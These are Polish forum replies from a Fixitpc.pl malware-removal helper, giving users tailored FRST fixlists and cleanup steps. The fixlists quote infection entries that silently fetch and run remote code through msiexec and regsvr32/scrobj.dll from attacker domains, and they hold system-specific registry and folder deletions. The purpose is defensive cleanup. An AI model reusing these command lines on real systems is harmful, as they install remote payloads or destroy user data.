Miszel03

W imieniu całego zespołu Fixitpc.pl dziękuję za pomoc w utrzymaniu serwisu!

Do przeprowadzania ataków DDoS wykorzystuję sieć tzw. komputerów zombie (rzadziej Botnetów). Twój komputer musiałby być podłączony do jednej z tych dwóch typów szkodliwej społeczności, aby brać udział w takim ataku. Dołączenie odbywa się poprzez infekcje systemu operacyjnego niezauważalnym programem. Najczęściej poprzez zarażone załączniki w email (= duża skala dziania). Sprawdzić...hmm...no nie jest łatwo, bo wymagany jest szerszy dostęp niż z poziomu narzędzi, którymi się posługuje. Zalecany jest kompleksowy skan antywirusowy z poziomu bootowalnego (np. za pomocą Kaspersky Rescue Disk). Jeśli podejrzewasz infekcję to proszę dostarcz zestaw raportów FRST oraz GMER.

Wszystko pomyślnie wykonane. AdwCleaner już nic nie znalazł, a mi udało się posprzątać system za pierwszym podejściem. Skoro problem wystąpił to uznaję, że możemy kończyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

1. Zagrożenia wykryte przez AdwCleaner daj do kasacji (używając opcji Oczyść). 2. Podsumuj obecny stan systemu, jeśli problem nie ustąpił (= czyli tak jak się spodziewam) to temat przenoszę do działu Windows 7.

Raporty nie wykazują oznak infekcji. W spoilerze zadaje zadania poboczne. Spróbuj przeinstalować program CCleaner i sprawdzić wynik. Temat przenoszę do działu Software.

W systemie grasuje infekcja WMI, która pociągnęła za sobą zarażone skróty przeglądarek. Ponad to jest infekcja adware podmieniająca publishera. To wszystko zebrane razem daje taki efekt jak Ty sam opisałeś. Proszę przeczytać na przyszłość - jak się przed tym ustrzec: KLIK. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: CustomCLSID: HKU\S-1-5-21-2124943525-1062159958-843887205-1000_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> "C:\Windows\system32\igfxEM.exe" => Brak pliku Task: {CFEDB4F2-8AA9-4B67-9B09-78F53526F255} - \Dulitain -> Brak pliku Task: {B1095981-32F5-4C81-AB5D-9C7BC0372BE8} - System32\Tasks\Phunaklqule Community => C:\Program Files (x86)\Stujutaingilely\lufuward.exe C:\Program Files (x86)\Stujutaingilely WMI_ActiveScriptEventConsumer_ASEC: HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [WindowsDefender] => - HKU\S-1-5-21-2124943525-1062159958-843887205-1000\...\Run: [Windows Defender] => - HKLM\...\Providers\xdvzibsb: C:\Program Files (x86)\Phunaklqule Community\local64spl.dll C:\Program Files (x86)\Phunaklqule Community ShellExecuteHooks: Brak nazwy - {779FAE58-2BC0-11E7-AFE7-64006A5CFC23} - C:\Users\Krzysiek\AppData\Roaming\Chudaph\Drejacultchaph.dll -> Brak pliku GroupPolicy: Ograniczenia S3 dbx; system32\DRIVERS\dbx.sys [X] S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World Racing\World Racing Multiplayer.lnk C:\Users\Krzysiek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\MyDefragGUI.lnk C:\Users\Krzysiek\AppData\Local\Microsoft\Windows\GameExplorer\{4355A7D1-BFE6-40B9-9A91-C264090C0E16}\PlayTasks\0\Zagraj.lnk ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Krzysiek\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\Krzysiek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Krzysiek\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/ ShortcutWithArgument: C:\Users\Krzysiek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Krzysiek\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/ RemoveDirectory: C:\Users\Krzysiek\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Krzysiek\AppData\Local\Mozilla C:\Users\Krzysiek\AppData\Roaming\Mozilla C:\Users\Krzysiek\AppData\Roaming\Profiles Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie inne nieznane i niepotrzebne Ci rozszerzenia Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. 3. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

W porządku, ale na forum tematów raczej nie zamykamy.

Ta sławna infekcji faktycznie zagościła u Ciebie w systemie. To błahostka, więc nie ma się czym przejmować. Już w pierwszym kroki zostanie usunięta. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2717061265-649508285-3199829881-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDN8MjUcEeqxMWLdw2FxGdY1NWJaMWLlEjH4ZH== /q IFEO\taskmgr.exe: [Debugger] ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku U3 awldyuog; C:\Users\Toshiba\AppData\Local\Temp\awldyuog.sys [56584 2017-04-30] (GMER) [brak podpisu cyfrowego] S4 sptd2; System32\Drivers\sptd2.sys [X] Task: {1C4C77C9-1292-4908-8435-57EA5763DEFD} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPDN8MjUcEeqxMWLdw2FxGdY1NWJaMWLlEjH4ZH== scrobj.dll DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Toshiba\AppData\Local\Mozilla C:\Users\Toshiba\AppData\Roaming\Mozilla C:\Users\Toshiba\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Nie rób nowych logów, dostarcz tylko raport wynikowy (plik Fixlog). Napisz czy problem ustąpił.

Konkretnej infekcji brak. Widać kilka instalacji typu PUP oraz resztki po innym adware. Nie wiem czy ma to związek z problemem, ale wyznaje zasadę, że najpierw leczenie infekcji, a potem inne rozwiązania pod system. 1. Przez panel sterownia odinstaluj: Programy typu PUP / Wątpliwe instalacje: Amazon Search, Amazon Assistant. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku U0 aswVmm; Brak ImagePath U3 pxroraoc; \??\C:\Users\ADMINI~1\AppData\Local\Temp\pxroraoc.sys [X] ShortcutWithArgument: C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Users\Siegmund\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> www.aqovd.com?oem=sunadplv3&uid=82HDP06YT_MQ01ABD032&tm=1468528928 Task: {1EACEBFB-0761-4DAA-82CB-5F88B1A6C3D4} - System32\Tasks\DistromaticUpdater-logon => C:\Program Files (x86)\Amazon Browser Settings\updater.exe [2017-02-04] (Distromatic) Task: {3F2F1884-8533-40D1-88AB-FBC1039245C8} - System32\Tasks\DistromaticSearchProtect-logon => C:\Program Files (x86)\Amazon Browser Settings\AmznSearchProtect.exe [2017-02-04] (Distromatic) Task: {A0606067-985C-49C2-8189-F1F11924BEA2} - System32\Tasks\DistromaticSearchProtect-hourly => C:\Program Files (x86)\Amazon Browser Settings\AmznSearchProtect.exe [2017-02-04] (Distromatic) Task: {DEA9BFD0-9485-4040-9F65-CEF270BB4331} - System32\Tasks\DistromaticUpdater-periodic => C:\Program Files (x86)\Amazon Browser Settings\updater.exe [2017-02-04] (Distromatic) EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Poprawkowe działania związane z kasacją szczątek po infekcji. Otwórz Notatnik w nim wklej: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Doeye DeleteKey: HKEY_USERS\S-1-5-21-252974029-621322211-1437129156-1001\SOFTWARE\Doeye DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox DeleteKey: HKEY_USERS\S-1-5-21-252974029-621322211-1437129156-1001\SOFTWARE\Firefox Reboot: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Po wykonaniu tego Fixu nie rób nowych logów, dostarcz tylko raport wynikowy (plik Fixlog). Podsumuj obecny stan systemu, napisz czy problem ustąpił itd.

W imieniu całego zespołu Fixitpc.pl bardzo dziękuję za dotację na utrzymane serwisu

2017-04-28 22:33:03, Info CSI 00000117 [sR] Cannot repair member file [l:48{24}]"SportsMainBackground.wmv" of Microsoft-Windows-OpticalMediaDisc-Style-Sports, Version = 6.1.7600.16385, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch 2017-04-28 22:33:12, Info CSI 0000011a [sR] Cannot repair member file [l:48{24}]"SportsMainBackground.wmv" of Microsoft-Windows-OpticalMediaDisc-Style-Sports, Version = 6.1.7600.16385, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch 2017-04-28 22:33:12, Info CSI 0000011b [sR] This component was referenced by [l:196{98}]"Microsoft-Windows-OpticalMediaDisc-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.OpticalMediaDisc" 2017-04-28 22:33:13, Info CSI 0000011e [sR] Could not reproject corrupted file [ml:520{260},l:108{54}]"\??\C:\Program Files\DVD Maker\Shared\DvdStyles\Sports"\[l:48{24}]"SportsMainBackground.wmv"; source file in store is also corrupted 2017-04-28 22:47:46, Info CSI 000002ea [sR] Cannot repair member file [l:48{24}]"SportsMainBackground.wmv" of Microsoft-Windows-OpticalMediaDisc-Style-Sports, Version = 6.1.7600.16385, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch 2017-04-28 22:47:47, Info CSI 000002ec [sR] Cannot repair member file [l:48{24}]"SportsMainBackground.wmv" of Microsoft-Windows-OpticalMediaDisc-Style-Sports, Version = 6.1.7600.16385, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch 2017-04-28 22:47:47, Info CSI 000002ed [sR] This component was referenced by [l:196{98}]"Microsoft-Windows-OpticalMediaDisc-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.OpticalMediaDisc" 2017-04-28 22:47:48, Info CSI 000002f0 [sR] Could not reproject corrupted file [ml:520{260},l:108{54}]"\??\C:\Program Files\DVD Maker\Shared\DvdStyles\Sports"\[l:48{24}]"SportsMainBackground.wmv"; source file in store is also corrupted Błędy związane z plikiem SportsMainBackground.wmv (+ Microsoft-Windows-OpticalMediaDisc-Package) to detale i to pomijam. Przykładowy plik wideo nie pływa na nic. Skan nie przyniósł żadnych niepokojących rezultatów. Powiedz mi w czym jest problem z systemem? Musisz go opisać byśmy mogli Ci pomóc.

Brakuje co prawda raportu GMER, ale nie wydaje mi się by w zaistniałym sytuacji był on potrzebny. W systemie brak oznak infekcji i nie mam nawet z czego zrobić kosmetyki systemowej. Programy AdwCleaner oraz Malwarebytes to rekomendowane i skuteczne twory, co niestety nie ma się do GridinSoft Anti-Malware. Wersja testowa nie umożliwia przetestowania tego programu, więc zakup ogranicza się do kupowania kota w worku. Podobna sytuacja jak ze SpyHunter. Zalecam deinstalacje tego oprogramowania po przez panel sterowania. Wyczyścimy obydwie przeglądarki, przeprowadzenie kolejnych skanów nie ma sensu - skoro MBAM i ADWC nic nie wykryły to trudno, żeby coś lepiej wykrywało adware / PUP. Google Chrome Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Mozilla FireFox Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Jeśli problem z reklamami nie ustąpi, a reklamy będą miały charakter infekcyjny (proszę o screena przykładowej reklamy) to poszerzymy diagnostykę. Komentując zaś z użyciem procesora to już temat na inny dział (raczej nie problem infekcji).

Sytuacja zgodna z opisem tematu. Dwie fałszywki: pod Google Chrome i pod Mozilla FireFox. Po za tym widać również wpisy startowe na powłoce i w Harmonogramie zadań uruchamiające różne strony. Do poczytania, obowiązkowo: KLIK. To uchroni Cię przed kolejną wizytą w tym dziale 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-252974029-621322211-1437129156-1001\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Doeye Task: {7BE3337D-631A-4D0C-8C69-A5F7CDA67D79} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q Task: {A40E3F91-5995-4A8A-8699-53EFAA9D14A6} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1XOYI2F8U4NUQSMjhXNYY2FTJLM8NXFTIdNjZLOTE5FF== scrobj.dll Task: {E40686E5-FC3F-44C2-9348-C26991415F62} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1XOYI2F8U4NUQSMjhXNYY2FTJLM8NXFTIdNjZLOTE5FF== scrobj.dll C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{D6635014-F9FD-489A-A18A-D2C4BCD33616}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe FirewallRules: [{8F2CADE9-7620-4E1E-978E-84231DE2E209}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{70086F64-9FA6-483E-BD52-F45BDBB50643}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Arekcipa\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Arekcipa\AppData\Local\Firefox HKU\S-1-5-21-252974029-621322211-1437129156-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XOYI2F8U4NUQSMjhXNYY2FTJLM8NXFTIdNjZLOTE5FF== /q HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> IFEO\DisplaySwitch.exe: [Debugger] IFEO\taskmgr.exe: [Debugger] HKU\S-1-5-21-252974029-621322211-1437129156-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108720 2017-04-26] () S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Arekcipa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Arekcipa\AppData\Local\Mozilla C:\Users\Arekcipa\AppData\Roaming\Mozilla C:\Users\Arekcipa\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). doeye;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Nie rozumiem? Co zostało przekazane?

OK.

1) Tak, ale ja Cie pokieruję (patrz sam dół posta). 2) OK. Kończymy. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Chudyy Popieram wątek o Windows Defender - to nie wystarczające narzędzie dla większości użytków, a co do Gridinsoft to uważałbym. Jeśli program wykrywa infekcję, a można ją usunąć dopiero po zakupie to z listy w bezwątpliwowców można go od razu wykreślić. Przykładem jest tu SpyHunter. Twoim tematem zajmę się niebawem. JohnyRambo Więc tak: w raportach widoczne są podejrzane elementy, które mogą świadczyć o infekcji. Robię sporą korektę systemu, czyli począwszy od kasacji martwych elementów programów kończąc na kasacji szkodliwych polityk grup w przeglądarce Google Chrome oraz igraszków na powłoce Shell. Wyczyścimy również Google Chrome oraz wszystkie pliki tymczasowe. Dodatkowo przeprowadzimy skan antywirusowy porządnym narzędziem. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-1425446643-2985461573-791015783-1001\...\Winlogon: [shell] C:\WINDOWS\explorer.exe [4674360 2017-03-04] (Microsoft Corporation) GroupPolicy: Ograniczenia GroupPolicyScripts: Ograniczenia SearchScopes: HKU\S-1-5-21-1425446643-2985461573-791015783-1001 -> DefaultScope {1A95DC8F-4A6D-4938-B715-50B59B516306} URL = SearchScopes: HKU\S-1-5-21-1425446643-2985461573-791015783-1001 -> {1A95DC8F-4A6D-4938-B715-50B59B516306} URL = R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] U3 kwwcapog; C:\Users\Positive_Michal J\AppData\Local\Temp\kwwcapog.sys [56584 2017-04-25] (GMER) [brak podpisu cyfrowego] DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Positive_Michal J\AppData\Local\Mozilla C:\Users\Positive_Michal J\AppData\Roaming\Mozilla C:\Users\Positive_Michal J\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie inne nieznane i niepotrzebne Ci rozszerzenia Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin 3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 4. Sprawdź poniższe pliki w usłudze VirusTotal.com. C:\ProgramData\gravity-20\gravity-8.exe C:\ProgramData\geometry-7\geometry-14.exe C:\ProgramData\powercap-91\powercap-44.exe C:\Users\Positive_Michal J\AppData\Roaming\joule-38\joule-31.exe C:\ProgramData\wimax-77\wimax-84.exe C:\ProgramData\battery-99\battery-76.exe C:\ProgramData\rs485-07\rs485-11.exe C:\Users\Positive_Michal J\AppData\Roaming\pulley-16\pulley-5.exe C:\ProgramData\wimax-60 Do każdego z osobna dostarcz link z analizą. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

OK, ale jednak nie decydowałbym się na niego. Może uBlock Origin do przeglądarki? To nie ma związku ze Fixem. Nie rozumiem - daj screena jak to wygląda z Twojej strony. Całość pomyślnie wykonana. System czysty pod względem infekcji. Z mojej strony to by było na tyle. Temat przenoszę do działu XP gdzie mogą Ci rozwiązać pozostałe problemy.

Cóż...konkretnej infekcji nie widać. System sprzątam z resztek po programach. W przeglądarce jedynie widoczny element wyszukiwarki adware, dlatego usuniemy go i wyczyścimy cała przeglądarkę. Wdrążam również skan przeciwko adware oraz PUP. 1. Włącz przywracanie systemu. 2. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {15D84BA6-82F1-459C-969E-E7CD1DEA80D2} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {6AF99882-BAD5-4D1F-99E0-1CB8E9FC4FDD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {6CB91903-B166-443C-BDCE-C7740AEE370B} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {83470142-A1A1-4ED1-BD72-144502C508E8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {83F88638-7FCF-40F6-941B-3E7ABE2E9D31} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {8AD245E1-BD4B-4C56-9AB9-867D5C83F18C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {B4837480-1CEC-43AF-9A39-ED8C4DEA5FBE} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {C1BD80F0-A7E7-45D8-A2FA-D1F38449C803} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku Task: {C6370F13-719E-4556-BD3A-F63A3FDAE662} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {CBAF81DB-2A29-459A-902F-96BEAAF43BF9} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {D9F1BD48-DA9C-45F2-81C3-28BCD0E1FED9} - \WPD\SqmUpload_S-1-5-21-1147513825-3514968562-1571062963-1002 -> Brak pliku Task: {F24FCC95-AC4F-40FA-A6C4-65D94594C1AF} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku IFEO\taskmgr.exe: [Debugger] ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => -> Brak pliku ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> 